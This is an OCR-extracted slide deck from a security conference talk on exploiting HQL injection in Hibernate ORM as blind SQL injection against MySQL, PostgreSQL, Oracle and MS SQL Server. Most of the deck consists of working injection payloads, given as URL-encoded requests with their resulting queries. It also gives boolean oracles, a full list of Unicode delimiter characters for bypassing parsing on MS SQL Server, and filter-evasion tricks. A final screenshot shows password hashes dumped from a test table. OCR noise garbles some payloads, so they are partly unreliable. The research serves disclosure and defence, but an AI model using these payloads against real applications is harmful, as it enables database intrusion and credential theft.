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ORM2Pwn: Exploiting injections 
in Hibernate ORM 


Mikhail Egorov 


Sergey Soldatov 


www.zeronights.org 


NIGHTS 
Short BIO - Mikhail Egorov 


D Application Security Engineer at Odin [ http://www.odin.com ] 
D Security researcher and bug hunter 


D Graduated from BMSTU with MSc. in Information Security [IU8] 
P) Holds OSCP and CISSP certificates 


> See my blog [ http://Oang3el.blogspot.com ] 
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NIGHTS 
Short BIO - Sergey Soldatov 


D Chief infosecurity manager at big corps IT insourcer 
e GRC © and "paper security” 

Security engineer and systems architect 

Security operations manager and analyst 

> Amateur hacker security researcher 

P BMSTU’s IU8 

P CISA, CISSP 


p http://reply-to-all.blogspot.ru/ 
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Motivation 


> Modern applications work with DBMS not directly but 
via ORM 


D In Java, Hibernate is a popular ORM [ Red Hat project ] 


D Hibernate uses HAL, which is very limited [ versus SOL] 
P HOLi exploitation is limited © 
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Motivation 


» sal» 


Picture from http://blog.h3xstream.com/2014/02/hql-for-pentesters.html 


CN 


ul 


P is it possible to exploit HOLi as SQLi for popular DBMSs? 
P» MySQL, Postgresql, Oracle, MS SQL Server are popular [in our opinion © ] 
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Chuck Norris can exploit SQLI even 
on static HTML pages 


NIGHTS 
MySQL DBMS 


D Hibernate escapes [‘] in string with [^] 
> MySQL escapes [‘] in string with [\’] 
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NIGHTS 
MySQL DBMS 


© What about string 'abcV'or 1=(select 1)--’? 


© Hibernate — ‘abc\’’or 1=(select 1)--’ [thinks it’s a string] 
© MySQL  — ‘abc\’’or 1=(select 1)--’ 


RRR 


ZERO RIGHTS 
MySQL DBMS 


© Navigate to URL 


http://127.0.0.1:8080/app/dummy\’’ ¢200r%201<len(select%20version())-- 


© HQL query - 


SELECT p FROM pl.btbw.persistent.Post p where p.name=‘dummy\’’ or 
1<len(select version())--' 


© SQL query 


select post0O .id as idl 0 , post0 .name as named 0 from post posti. 
where post0O .name=‘dummy\’’ or 1<len (select version())--' 
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NIGHTS 
Postgresql DBMS 


@ Trick with V’ not working 


e Quote escaping with ° only [not with \’] 


© HQL allows subqueries in where clause 
© Hibernate allow arbitrary function names in HQL 
© Postgresql has nice built-in query to xml(‘SQU) 
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NIGHTS 
Postgresql DBMS 


@ query to xml(‘SQU’) return XML [not usable directly ] 


© Nevertheless it is possible to know if the SQL return O 
rows or > 0 


array upper(xpath('row',query to xml('select 1 where 1337>1', true, 
false,'')),1) 


array upperixpathi'row',query to xml ("select l where 1337«1', true; 
false,'')),1) 
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SQL returns 1 row [ or more | 


Postgresqal DBMS 


root@kali: ~ 


File Edit View 
postgres=# select array_upper(xpath(' 


true: -talse 7-34 m: 
array_upper 


Search Terminal 


Help 


row', query_to_xml('sebect 1 where 1337>1', 


SQL returns no rows 


root@kali: ~ 
File Edit View Search Terminal Help 
postgres=# select array upper(xpath('row', 
true, Talem, J); 1); 


array upper 


query to xml('setect 1 where 1337<1', 


NIGHTS / 
Postgresal DBMS 


© Navigate to URL 


http://127.0.0.1:8080/hqli.playground/dummy$27%20and%20array upper$28xpath$282$27row£$27$2Cqu 
ery to xml%28%27select%201%20where%201337%3E1%927%2Ctrue%2Cfalse%2C%27%27%29%29%2C1%29%3D1%2 
0and$202$2712$27$3D$2711 


© HQL query 


SELECT p FROM hgli.persistent.Post p where p.name='dummy' and 
array upper (xpath('row',query to xml('select 1 where 1337>1',true,false,'')),1)=1 and 
mata 


© SQL query 


select post) ,id as adl 0, posto .name as namez 0 irom post POSLU where 
postO0 .name-'dummy' and array upper (xpath('row', query to xml('select 1 where 1337>1', 
true, false, '')), 1)=1 and 'l'="1 
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Oracle DBMS 


@ Trick with V’ not working 
Quote escaping with ° [ not with V ] 


© Hibernate allow arbitrary function names in HQL 
© Oracle has nice built-in DBMS XMLGEN.getxm!(‘SQU) 
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NIGHTS 
Oracle DBMS 


© DBMS_XMLGEN.getxml(‘SQL’) returns CLOB or null 
[ null if SQL returns no rows | 


© It is possible to know if the SQL return 0 rows or > 0 
using TO CHAR and NVL built-ins 


NVL(TO CHAR (DBMS XMLGEN.getxml('SQL')),'1'!)!-'1' 
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Oracle DBMS 


© Navigate to URL 


http://127.0.0.1:8080/app/dummy'%20and%20NVL (TO CHAR (DBMS XMLGEN.getxml ('SELECT%201337%20FR 


OM%20dual%20where%201337>1')),'1')!='1'%20and%20'1'='1 

© HQL query 

SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy' and 

NVL(TO CHAR (DBMS XMLGEN.getxml ("SELECT 1337 FROM dual where 1337>1')),'1')!='1' 
and '1'z']" 

© SQL query 


Select postü .id as 101 D , posrtÜ-,name as namez U From post postu where 
post0 .name-'dummy' and NVL(to char (DBMS XMLGEN.getxml('SELECT 1337 FROM dual 
where 1337>1')), '1')«»'1l' and '1'='1' 
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Microsoft SQL Server DBMS 


@ Trick with V’ not working 


e Quote escaping with ° only [not with \’] 


@ There are no usable functions like query to xml('SQU) 


| ANRT 


NIGHTS 
Microsoft SQL Server DBMS 


© Hibernate ORM allows Unicode symbols in identifiers!!! 


ANTLR grammar for HQL parsing is here 


https://github.com/hibernate/hibernate-orm/blob/1ed895a3737c211e8c895b029 7f801daccfe85a9/hibernate-core/src/main/antlr/hal. 


ANTLR (ANother Tool for Language Recognition) - http://www.antlr.org/ 


— ^ NIGHTS f 
Microsoft SQL Server DBMS 


© Hibernate ORM allows Unicode symbols in identifiers!!! 


IDENT options { testLiterals=true; } 
| ID START LETTER (| ID LETTER J” 
{ 


// Setting this flag allows the grammar to use keywords as identifiers, if necessary. 
setPossibleID(true); 


protected 
ID START LETTER 


Y Y 


| '"$! 


| AL 
| "\u0080'..'\ufffe' // HHH-558 : Allow unicode chars in identifiers 
protected 
ID LETTER 
ID START LETTER 


| AT gI 
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Microsoft SQL Server DBMS 


© MS SQL Server allows Unicode delimiters in query!!! 
There are many delimiters like space [U+0020] 
LEN(U(selectU(1)) [U — Unicode delimiter | 


© We’ve found them all with dumb Fuzzing!!! 
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Microsoft SQL Server DBMS 


© Here are the magic delimiters [U] 


U+00A0 
U+1680 
U+2000 
U+2001 
U+2002 
U+2003 
U+2004 
U+2005 
U+2006 
U+2007 
U+2008 
U+2009 


%C2%A0 

%E1%9A%80 
%E2%80%80 
%E2%80%8 1 
%E2%80%82 
%E2%80%83 
%E2%80%84 
%E2%80%85 
%E2%80%86 
%E2%80%8 7 
%E2%80%88 
%E2%80%89 


No-break space 
OGHAM SPACE MARK 
EN QUAD 

EM QUAD 

EN SPACE 

EM SPACE 
THREE-PER-EM SPACE 
FOUR-PER-EM SPACE 
SIX-PER-EM SPACE 
FIGURE SPACE 
PUNCTUATION SPACE 
Thin space 
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Microsoft SQL Server DBMS 


© Here are the magic delimiters [U] 


U+200A 
U+200B 
U+2028 
[2029 
U+202F 
U+205F 
U+3000 


%E2%80%8A 
%E2%80%8B 
%E2%80%A8 
%E2%80%A9 
%E2%80%AF 
%E2%81%9F 
%E3%80%80 


HAIR SPACE 

ZERO WIDTH SPACE 

LINE SEPARATOR 
PARAGRAPH SEPARATOR 
NARROW NO-BREAK SPACE 
Medium Mathematical space 
Ideographic space 
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Microsoft SQL Server DBMS 


© Navigate to URL 


http://127.0.0.1:8080/app/dummy$27%200r$%201$3CLENS28%C2$A0%28selectS$C2%A0top$C2$A01$C2%$A0una 
me$C2$A0from$C2$A0postusers$29$29$200r$20$2731$27-2$27143999 


© HQL query 


SELECT p FROM pl.btbw.persistent.Post p where p.name-'dummy' or 1<LEN([U+00A0] ( 
select [U+00A0] top [U+00A0]1[U+00A0] uname [U+00A0]from[U+00A0]postusers)) or '31'-2'143999' 


Hibernate sees here two function calls: Len and [U+00A0!] 
Identifier select[U+00A0]top[U+00A0]1[U+00A0]Juname[U+00A0]Jfrom[U+00A0]postusers is passed as function argument 


© Resulting SQL query 
select postO .id as id1 O , postO .name as name2 O from post postO where postO_.name='dummy' or 
1<len([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999' 
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Microsoft SQL Server DBMS 


select post .id as idl U , post) name as nates 0- from post posto where 


post0 .name-'dummy' or 
1<len([U+00A0] (select [U*00A0] top[U*00A0]1[U*00A20] uname [U+00A0] from[U+00A0]postusers) ) 


Is the same as 


select posrtÜ -id as idl 0 , postü .name as names D. Irom post posto where 
postÜ ,.name-'dummy' or l«len(select top l uname from postusers)) or '31'5'143393' 
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Microsoft SQL Server DBMS: additional useful tricks 


where id=13 where id like 13 No “=" 

where field-'data' where field like cast(OxDATA_IN_HEX as varchar) No “=“; No “’ “ 
where field not in ('data1', where 0 like charindex(concat(‘+’,field,’+’), No list 
‘data2’) cast(OXDATA1DATA2 IN HEX as varchar(MAX))) 

OxDATA IN HEX UOxDATA IN HEX int || func > 
smth known to hibernate(..)  Usmth known to hibernate(..) identifier 
substring((select...),N,1)='c’ N like charindex(‘c’, (select...), N) edd 
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a Hey, dude stop it! Show me the hack! 


y 


Video - https://www.youtube.com/watch?v=m MTWZptXUw 
All demo scripts are here - https://github.com/Oang3el/Hibernate-Injection-Stud 
Vulnerable App - https://github.com/Oang3el/HQLi-playground 
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Takeaways 


> HAL injection is SQL injection [exploit HQLi as bSQLI ] 
D Hibernate is not a WAF 


P Our exploitation technique works because: 
D Hibernate allows arbitrary names for identifiers (function and 
argument names) 
D Hibernate allows Unicode symbols in identifiers 
D Hibernate escapes quotes [‘] in string by doubling them [^] 
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Questions? 


FFF Script tor SelectTopNRows command from SSMS 
=|SELECT TOP 1000 [uid] 
, [uname] 
, [password] 
, [comment] 
FROM [hgli].[dbo] T Postuseps] 


100% ~ 


= CA Databases 


+ La System Databases 


3 B hali 
Cm Database Diagrams 
Lj Tables 
I System Tables 
Ca FileTables 
C] dbo.Post 
C] dbo.Table 1 
C] dbo.Postusers 
A Views 
Cm Synonyms 
Cm Programmability 
3j [A Service Broker 
3 La Storage 
3 La Security 
Security 
Server Objects 
Replication 


EJ Results Ja Messages 
uid uname password ; comment 
“| jlennon 53e67c23 1cc0b8e6sees 1 4dcae 36eb 0 NULL 
~ pmocartney 74e4ce8df8821f882276adb293b481be NULL 
gharison 7e4da4cbibebf8fa 19090adfeb491dd NULL 
admin 7e458af78194729d1dc7e2923a088243 NULL 
ad db226896cb94da73069fe 752e371e014 NULL 


Management 
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